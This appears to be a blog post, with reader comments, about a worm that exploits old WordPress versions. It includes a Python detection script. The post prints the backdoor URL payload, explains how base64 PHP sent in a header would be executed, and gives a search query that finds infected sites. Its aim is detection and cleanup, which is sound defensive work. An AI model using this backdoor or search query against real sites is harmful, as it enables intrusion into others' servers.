Unpatched WordPress Users Hit by Worm
Have a blog? Is it running WordPress (i.e. the WordPress.org software, on your own domain)? Haven’t updated the software in a month or longer?
Guess what? You may not be the only one posting on it!
News is going around about a rather sneaky WordPress worm. After registering for the blog, it uses a privilege escalation vulnerability in versions of WP older than 2.8.3 to get admin powers, lie dormant, and eventually do…something. Post spam? Malware links? The sky is the limit, really. (WordPress announcement here, information about the latest security update, 2.8.4, here).
There are some good resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post:
How Do I Know If My Site Has Already Been Attacked?
There are two clues that your WordPress site has been attacked.
There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.”
The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
So it looks like there are percent-encoded (hex) characters in the URL, as well as a new admin account. Using this information, and a crafted Google search string (many variations would work):
“Powered by WordPress” inurl:eval(base64_decode(
…we find one such hacked site, with the following post addresses (NOTE: DON’T visit unless you know what you’re doing! Right now it’s benign, but that could change!):
So, let’s take one of the above links:
hxxp://www.wowfailblog.com/2009/06/30/pac-man-the-movie/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D%7C.+)&%/
and notice that it is almost, but not quite, identical to the format of some other hacked sites:
hxxp://bloodsweatvector.com/2009/04/28/from-russia-with-love/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D%7C.+)&%/
…though they’re both definitely from the same campaign. HTTP_REFERER seems to be far more popular than HTTP_EXECCODE (1,340 sites vs. 399).
If we decode the percent-encoded characters in the first link, we get a clearer picture of what’s happening:
hxxp://www.wowfailblog.com/2009/06/30/pac-man-the-movie/?{${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
…see what’s happening there? That, my friends, is what we call a backdoor. Create a header called “HTTP_REFERER” (not to be confused with the legitimate “Referer” header). Place base64-encoded code in it (PHP, it appears) and watch as it’s eval’ed on the fly, forcing the site to do just about anything. Note that I did not attempt testing this, as it’s executing arbitrary code on someone else’s system, and that’s a big, illegal no-no.
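The decoding step above can be automated for anyone who wants to sweep their own permalinks or access logs for this signature. The script below is an added example written for this post, not code from the original article, Lorelle, or Journey Etc.; the sample URLs are the two defanged (“hxxp”) addresses quoted above plus one constructed clean URL. It percent-decodes each URL, flags the eval(base64_decode($_SERVER[...])) pattern, and reports which $_SERVER key the backdoor reads. One caveat worth knowing when writing a rule from this: PHP fills $_SERVER['HTTP_REFERER'] from the request’s Referer header (any header Foo-Bar becomes HTTP_FOO_BAR), so the HTTP_REFERER variant is fed through the ordinary Referer header and the HTTP_EXECCODE variant through a custom “Execcode” header; the helper php_server_key_to_header() shows that mapping.

```python
import re
from urllib.parse import unquote

# Constructed sample input: the two defanged permalinks quoted in the post
# ("hxxp" stands in for "http"; these are not live links) plus a clean URL.
SAMPLE_URLS = [
    "hxxp://www.wowfailblog.com/2009/06/30/pac-man-the-movie/"
    "%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D%7C.+)&%/",
    "hxxp://bloodsweatvector.com/2009/04/28/from-russia-with-love/"
    "%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D%7C.+)&%/",
    "hxxp://example.com/2009/08/01/a-normal-post/",
]

# Matches eval(base64_decode($_SERVER[<KEY>])) after percent-decoding, with or
# without quotes around the key and with optional whitespace.
BACKDOOR_RE = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[\s*['\"]?([A-Z0-9_]+)['\"]?\s*\]\s*\)\s*\)",
    re.IGNORECASE,
)


def decode_url(url: str) -> str:
    """Percent-decode until the string stops changing, so a double-encoded
    payload surfaces too. Invalid escapes such as '%&' are left untouched."""
    for _ in range(5):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url


def inspect_permalink(url: str):
    """Return the $_SERVER key the backdoor reads (e.g. 'HTTP_REFERER'),
    or None if the URL does not carry the eval/base64_decode signature."""
    match = BACKDOOR_RE.search(decode_url(url))
    return match.group(1).upper() if match else None


def php_server_key_to_header(server_key: str) -> str:
    """Reverse PHP's CGI-style mapping: HTTP_FOO_BAR <- request header 'Foo-Bar'.
    Useful when turning a finding into a WAF or log rule on the real header name."""
    if not server_key.startswith("HTTP_"):
        raise ValueError("not an HTTP_* key: %s" % server_key)
    parts = server_key[len("HTTP_"):].lower().split("_")
    return "-".join(p.capitalize() for p in parts)


def scan(urls):
    """Return one finding per suspicious URL: original, decoded form,
    the $_SERVER key read, and the request header that feeds it."""
    findings = []
    for url in urls:
        key = inspect_permalink(url)
        if key:
            findings.append({
                "url": url,
                "decoded": decode_url(url),
                "server_key": key,
                "header": php_server_key_to_header(key),
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_URLS):
        print("%s -> reads $_SERVER[%s] (request header '%s')"
              % (f["url"], f["server_key"], f["header"]))
```

Point scan() at the permalinks pulled from your own sitemap or at the request paths in your access log; a hit tells you which header to look for in the same log lines, and the hidden-admin check from Lorelle’s post above should follow immediately, since the URL anomaly can disappear once the bogus account exists.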
This all seems like a handy initial takeover mechanism, but once the bogus Admin account has been added, it seems like this would be more useful for detecting infected sites than it is for further intrusion. Registering on a blog and somehow modifying these URLs would seem to be the initial vulnerability and attack vector. From the WordPress 2.8.3 upgrade post:
Unfortunately, I missed some places when fixing the privilege escalation issues for 2.8.1. Luckily, the entire WordPress community has our backs. Several folks in the community dug deeper and discovered areas that were overlooked. With their help, the remaining issues are fixed in 2.8.3. Since this is a security release, upgrading is highly recommended.
Sounds about right. Too bad some people didn’t heed the warning!
Some closing thoughts on the subject:
- I calculate roughly 1,700 sites currently compromised and exhibiting the above URL anomalies. As we’ve seen, though, such signs of infection could be done away with after a new Admin account is created, so infection rates could be higher.
- Despite some hysterical comments, all signs point to 2.8.3 and 2.8.4 both being safe from the attacks. There are, however, some apocryphal reports of 2.8.3 being exploited, but this doesn’t jibe with the official WordPress announcement.
- Registration has to be available on a blog for infection, not just comments.
- This does NOT affect WordPress.com users, like yours truly. WordPress.com is kept updated regularly.
- The exact mechanisms of attack are as yet unexplained, as far as I can tell. If someone can find a detailed writeup on the subject, or has logs of an attack, please let me know in the comments or email me at {bytesandbages}[at]{gmail.com}!
And if you’re not already infected? For the love of God, UPGRADE. If you are infected, email me and let’s try to get some more details about who just might be behind this. After that, follow Journey Etc’s excellent advice on clean-up. But only after.
Don’t think that this is a big deal? Read this. Not fun at all.
- David “Scared to Switch-Over to WordPress.org” Oxley

I am a victim. I upgraded my self-hosted WP two days before, but my blog was attacked today. I’m going to try Journey Etc’s advice. Thanks for the pointer.
Thank you for the post. I noticed that my permalink URLs did not work as expected, and I was suspicious after seeing the fake HTTP referrer piece.
Googled around and finally thanks to your blog and Journey Etc., fixed and upgraded.
Hi there
Thanks for the post, as it’s helped me a lot. I saw this error on my site and didn’t know what it was till I read this. I’ve upgraded my WordPress now, but it still says I’ve got 2 admins on my blog, but when I look at the users I can only see 1. Any ideas why?
Will upgrading my blog automatically solve the referer error, or do I have to do anything else?
Woc